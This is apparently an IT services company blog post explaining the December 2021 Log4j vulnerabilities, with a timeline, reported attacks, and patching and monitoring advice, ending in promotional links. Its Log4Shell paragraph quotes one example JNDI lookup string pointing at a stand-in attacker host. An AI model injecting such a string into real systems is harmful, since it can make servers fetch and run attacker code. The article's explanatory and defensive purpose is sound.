by Scott Jack
Content Contributor, E-N Computers
7+ years experience in healthcare IT and tech support.
On December 16, 2021, CISA Director Jen Easterly warned, “The Log4j vulnerability is the most serious vulnerability that I have seen in my decades-long career.” She attributed this to the compromised software’s ubiquity, the simplicity of the attack, and the complexity involved in identifying and remediating compromised systems. Because of these features, we want to cover what Log4j is, what the vulnerabilities are, and how you should respond.
QUICK ANSWER:
What is the Log4j exploit?
Several vulnerabilities were discovered in Log4j, a tool for Java applications to record activity. The exploits allow remote unauthenticated users to send commands to servers, install malicious code, or gain access for later use. You should identify and patch affected software as soon as possible. Regularly updating and monitoring systems helps to reduce cybersecurity risks.
What is Log4j?
Apache Log4j is a free, open-source tool built into millions of Java-based applications. It is used in everything from video games to hospital equipment, industrial control systems, and cloud services. Companies like Microsoft, Apple, Google, Oracle, and Cisco all rely on Log4j. What is it used for?
Log4j is used to log, or record, activity in applications for troubleshooting, security, or auditing. Software developers control what is logged. Most commonly, logs include things like user IDs, IP addresses, timestamps, events or actions happening in the software, and any errors or messages. Sometimes applications record user-generated text. This is important to understanding the vulnerabilities that were discovered in Log4j.
What Are the Vulnerabilities?
In December 2021, Apache announced three vulnerabilities affecting Log4j. The vulnerabilities were introduced in 2013, when a feature called Java Naming and Directory Interface (JNDI) was integrated into the logging tool. Below is a timeline of the December 2021 announcements and fixes.
December 9: Apache warns about an unpatched exploit named CVE-2021-44228, also called Log4Shell. It is rated 10/10 for severity. With a fairly simple string of text like jndi:ldap://attacker-website.com/malicious-payload, a remote unauthenticated user can direct a machine running Log4j to download malicious code or leak information. The exploit was quickly put to use and tested.
In one demonstration, changing the device name in Settings on an iPhone provided access to Apple iCloud servers. Minecraft players could use the in-game chat box to infect a server. Researchers identified attacks that used this exploit to install ransomware or cryptomining software.
December 10: Apache releases Log4j 2.15.0, a patch that addresses this vulnerability in the most common configurations.
December 14: Apache warns of a variation on the vulnerability, identified as CVE 2021-45046. Initially considered less serious, it is upgraded to a severity of 9/10. Using a JNDI lookup pattern, attackers can initiate a denial-of-service attack to make a server unavailable to its intended users.
On the same day, Apache releases patch 2.16.0, which resolves this issue by disabling JNDI by default and removing lookup pattern support.
December 17: Apache publishes information on a third vulnerability, CVE 2021-45105, that they rate 7.5/10. It uses carefully crafted text input to cause denial-of-service. They release patch 2.17.0 to resolve this issue.
December 20: A cybersecurity research group announces that Log4j is being exploited to infect Windows and Linux machines. They found attackers using it to install Dridex, a trojan that steals bank credentials, on Windows. On Linux, it was used to allow remote commands and software from an attacker to be run on infected machines.
Because the exploit is well-publicized, companies that use Log4j are working to identify affected systems as quickly as possible and update them all. At the same time, attackers are rushing to use it while the window of opportunity is open. Microsoft has observed use of the exploit to identify compromised systems and gain access for later use.
The Netherlands National Cybersecurity Center is maintaining a list of commercially available affected software on GitHub.
Appropriate Response
An appropriate response requires identifying affected software in use by your organization, updating said software promptly, and review systems to determine if any damage occurred.
Step 1—Identify affected software. Make a list of all affected software, whether it is commercially available or a custom-built in-house application. Because Log4j is widely used in Java-based applications, you may have more than one compromised application or service. After identifying exposed systems, you need to implement a fix.
Step 2—Update affected software. You should apply security updates to all your compromised systems as soon as possible. Many vendors have provided patches or identified workarounds that you should implement without delay. If the software is built in-house, your developer should deploy Log4j 2.17.0 if they haven’t already. Then you need to make sure any remaining threat is neutralized.
Step 3—Review system security. Patching your systems closes the door, but it is possible an attacker already gained access while the door was open. Attackers may have installed malware with the intention of leaving it dormant and undetected for some time, gathered information, or created one or more user accounts for later access. Scanning your systems and reviewing your logs can help identify such intrusions.
Implement Good Cybersecurity Practices
Good cybersecurity practices reduce the likelihood and severity of a breach. You should keep your software up-to-date, use a modern hardware firewall, and actively monitor your systems for unusual activity. By layering these behaviors, you improve your odds of avoiding a network breach.
Keep all software updated. Maintaining up-to-date software is an important part of IT security. Sometimes people are reluctant to update because everything seems to be working fine, because they don’t want something to break inadvertently, or because it will interrupt their work. But these updates often include bug and security fixes that protect you and your clients.
Keep antivirus updated. While we said all software, we want to emphasize the importance of keeping your antivirus software up-to-date. This includes both the application and its virus definitions, which it uses to identify malware. By keeping both up-to-date, you will be better able to isolate an intrusive program and prevent it from spreading.
Use a modern hardware firewall. A modern hardware firewall is another important layer of protection for your network. It controls the flow of information between your internal network and the internet. Next-generation firewalls can better inspect network traffic, identify threats, and make it more difficult for a malicious actor to move within your network. On the other hand, older firewalls have less advanced features and may no longer receive support or security patches from the vendor.
Monitor your systems. Daily monitoring of the reports from your firewall, antivirus, and other systems helps you catch problems early. When you detect unusual activity or concerning patterns, you can adjust security protocols accordingly.
These steps are all part of a mature IT strategy that aligns technology with your business needs and goals. Does your IT strategy have room for improvement? Take our five-minute IT self-assessment to find out. An optimized business-IT strategy, including a secure network, protects and strengthens your business.
E-N Computers has helped hundreds of clients to improve their network security. Our managed IT services include remote monitoring and management so that your operating systems and antivirus software are always up-to-date, automatically generated reports are reviewed daily, and potential security issues are addressed early on.
Next Steps: Learn More About Cybersecurity
READ: How to Respond to a Cybersecurity Incident
READ: What to Know When Replacing Your Network Firewall
What should you do when you learn that your systems have been compromised in a cybersecurity incident? To act quickly when that happens, you need to make a plan now. Develop an incident response plan (IRP) now that identifies your response team members, their roles, and the process you will follow. It will include limiting the damage, investigating your vulnerabilities, restoring your data and systems, and improving your security. To learn more, check out our article, How to Respond to a Cybersecurity Incident.
If your firewall is outdated, no longer supported by the vendor, or no longer meets your business needs, it’s time to upgrade. Factors like your internet connection, number of users, how they connect, and special security requirements all affect what kind of firewall you need. Read more about this topic in our article, What to Know When Replacing Your Network Firewall.
Take the IT Maturity Assessment
Is your business ready to weather changes, including employee turnover? Find out by taking our IT maturity assessment.
You’ll get personalized action items that you can use to make improvements right away. Plus, you’ll have the opportunity to book a FREE IT strategy session to get even more insights into your IT needs.
